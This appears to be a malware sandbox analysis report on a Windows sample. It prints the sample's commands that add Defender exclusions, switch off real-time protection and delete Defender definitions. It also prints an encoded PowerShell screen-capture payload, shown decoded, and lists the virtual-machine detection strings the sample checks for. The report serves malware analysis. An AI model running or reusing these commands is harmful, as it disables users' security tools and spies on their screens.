Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF644879280 FindFirstFileExW,FindClose,	0_2_00007FF644879280
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6448783C0
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF644891874
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF644879280 FindFirstFileExW,FindClose,	1_2_00007FF644879280
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF644891874
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6448783C0
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	84_2_00007FF71F0B46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0F88E0 FindFirstFileExA,	84_2_00007FF71F0F88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	84_2_00007FF71F0AE21C

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 1_2_00007FFDFAEE11E0 GetSystemInfo,

1_2_00007FFDFAEE11E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: svchost.exe, 00000020.00000002.3494931048.000002224EE5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3493709445.000002224982B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fecodevmware
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f8vmusrvc
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d2qemu-ga
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACB6F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fecodevmsrvc
Source: bound.exe, 0000000F.00000002.4232992924.000000001B17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport7
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWx
Source: rar.exe, 00000054.00000002.2054225023.0000019522C99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage",
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABE6A000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWket %SystemRoot%\system32\mswsock.dllo the same
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF64488A614

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 1_2_00007FFDFAE9F160 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFAE9F160

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF644893480 GetProcessHeap,

0_2_00007FF644893480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF64488A614
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF64487D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF64487D12C
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF64487C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF64487C8A0
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF64487D30C SetUnhandledExceptionFilter,	0_2_00007FF64487D30C
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF64488A614
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF64487D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF64487D12C
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF64487C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF64487C8A0
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF64487D30C SetUnhandledExceptionFilter,	1_2_00007FF64487D30C
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8553028 IsProcessorFeaturePresent,00007FFE148D1730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE148D1730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDF8553028
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0F4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	84_2_00007FF71F0F4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0EA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	84_2_00007FF71F0EA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0EB6D8 SetUnhandledExceptionFilter,	84_2_00007FF71F0EB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0EB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	84_2_00007FF71F0EB52C

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
